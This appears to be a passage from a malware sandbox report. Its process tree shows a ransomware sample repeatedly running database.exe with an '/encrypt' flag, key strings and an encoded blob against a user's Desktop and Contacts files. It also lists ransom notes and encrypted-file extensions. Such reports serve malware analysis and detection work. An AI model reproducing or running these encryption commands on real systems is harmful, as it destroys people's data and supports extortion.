                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7148
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6672
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1020
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3276
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6676
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1380
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4676
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1892
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearCheckpoint.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6156
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearRestore.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:232
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CloseMeasure.ADT.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4512
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\cmd.exe.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CmqL7QFf-57e8zezN.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7012
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CompleteFormat.mid.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ConvertFromExport.vssm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6328
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"
